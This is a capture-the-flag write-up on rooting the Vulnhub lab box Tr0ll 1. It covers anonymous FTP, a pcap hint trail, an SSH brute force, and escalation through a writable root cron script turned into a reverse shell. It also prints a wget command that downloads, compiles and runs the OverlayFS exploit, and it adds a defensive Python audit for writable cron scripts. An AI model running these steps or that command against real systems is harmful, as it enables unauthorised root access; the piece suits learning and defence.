This post describes the steps needed to gain root on Tr0ll 1, available on Vulnhub (https://www.vulnhub.com/). The goal for this box, according to its author Maleus (https://twitter.com/maleus21), is simple: gain root and read Proof.txt from the /root directory.

Machine Name: Tr0ll: 1
Resource URL: https://www.vulnhub.com/entry/tr0ll-1,100/
Release Date: 14 Aug 2014

Summary
To obtain administrative access on this box, the following kill chain was executed.
- Recon identified an FTP service with anonymous login enabled.
- Log in to FTP anonymously and download the lol.pcap file.
- Search for files, usernames, passwords and directories.
- Brute-force attack against the SSH service.
- A crontab entry executes a script with root privileges; the script is writable, allowing the attacker to modify its content and obtain a root shell.
WriteUp
Recon
During the recon step, the attacker enumerated the open ports and services on the target machine.

The nmap NSE script ftp-anon.nse identified that anonymous FTP login is allowed on the target. FTP is running on port 21/TCP under vsftpd 3.0.2. Inside the anonymous account, ftp-anon.nse reported a pcap file called lol.pcap.
To access FTP with the anonymous account, the attacker used an FTP client and supplied the username ‘Anonymous’ and, as the password, any string in e-mail format, such as ‘notareal@email.com’; without this, the FTP server rejects the authentication attempt.

The lol.pcap file was analysed in Wireshark. The HTTP object secret_stuff.txt contains information about a directory called /sup3rs3cr3tdirlol/.

A check against the directory /sup3rs3cr3tdirlol/ returns a valid directory with a file called roflmao inside.

The roflmao file was examined. It is a 32-bit ELF binary, and running strings on it returns a hint embedded in the file: “Find Address 0x0856BF to procceed“.


The new directory is located at 192.168.1.137/0x0856BF and returns an Index Of listing with 2 directories.

Inside the good_luck directory, a user list called which_one_lol.txt was found.

The user wordlist was edited to one username per line.

The password was found in the directory 192.168.1.137/0x0856BF/this_folder_contains_the_password. Quite literally, the password is the file name ‘Pass.txt’.

Exploitation
To gain a foothold on the target system, a brute-force attack was executed and succeeded. The user overflow has the password ‘Pass.txt’.

The credential allowed the attacker to connect to the target system over SSH with the privileges of the overflow user.

Privilege Escalation: Part 1
On the target system, a check for files with overly permissive permissions in the filesystem returned some scripts, among them /lib/log/cleaner.py, which is executed by a root cron job.

The content of /lib/log/cleaner.py was replaced with a reverse shell. When the cron job runs, the reverse shell connects back to the attacker's machine, giving root access to the system.

Once the attacker has root privileges, the flag can be read.
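The root cause here is a root cron job whose script is writable by unprivileged users. The following audit, an added example and not part of the original write-up or the box, parses crontab lines in the system format (minute hour dom month dow user command), resolves the absolute paths each root job references, and flags those that are group- or world-writable. The crontab content and the /lib/log/cleaner.py mirror it builds in a temporary directory are constructed for the demo.

```python
import os
import re
import stat
import tempfile

# Constructed sample crontab (system format with a user field), not the box's own.
SAMPLE_CRONTAB = """\
# cleanup job mirroring the Tr0ll 1 misconfiguration
*/2 * * * * root python /lib/log/cleaner.py
17 * * * * root cd / && run-parts --report /etc/cron.hourly
"""

# Five schedule fields, then the user, then the command.
CRON_LINE = re.compile(r"^\s*(\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+)$")


def scripts_from_crontab(text):
    """Return (user, path) for every absolute path referenced by a cron command."""
    jobs = []
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        m = CRON_LINE.match(line)
        if not m:
            continue
        for token in m.group("cmd").split():
            if token.startswith("/") and len(token) > 1:
                jobs.append((m.group("user"), token))
    return jobs


def writable_by_others(path):
    """True if the file exists and is group- or world-writable."""
    try:
        mode = os.stat(path).st_mode
    except FileNotFoundError:
        return False
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit(crontab_text, root="/"):
    """List paths run by root jobs that a non-root user could modify."""
    findings = []
    for user, path in scripts_from_crontab(crontab_text):
        real = os.path.join(root, path.lstrip("/"))  # remap into a mirror root
        if user == "root" and writable_by_others(real):
            findings.append(path)
    return findings


def demo():
    """Build a throwaway mirror with a world-writable cleaner.py and audit it."""
    base = tempfile.mkdtemp()
    os.makedirs(os.path.join(base, "lib", "log"))
    script = os.path.join(base, "lib", "log", "cleaner.py")
    with open(script, "w") as f:
        f.write("print('clean')\n")
    os.chmod(script, 0o777)  # the weak permission the write-up exploits
    return audit(SAMPLE_CRONTAB, root=base)  # returns ['/lib/log/cleaner.py']
```

Running audit() with the real /etc/crontab content and the default root of "/" gives the same check for a live host; fixing a finding means chmod 755 on the script and root ownership on it and its parent directory.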

Privilege Escalation: Part 2
The script Linux Exploit Suggester (https://github.com/mzet-/linux-exploit-suggester) was executed on the target system with the privileges of the overflow user. The tool reported the OverlayFS exploit (CVE-2015-1328) (https://www.exploit-db.com/exploits/37292) as highly probable to succeed for local privilege escalation.

# Command to download, compile and run the exploit https://www.exploit-db.com/raw/37292
wget https://www.exploit-db.com/raw/37292 -O /tmp/ofs.c && cd /tmp/ && gcc ofs.c -o ofs && ./ofs

Conclusion
The recon and enumeration steps really pissed me off. This box is really CTF-like, not real-world-like.
Resources
- Overlayfs exploit: https://www.exploit-db.com/exploits/37292
- Linux Exploit Suggester: https://github.com/mzet-/linux-exploit-suggester
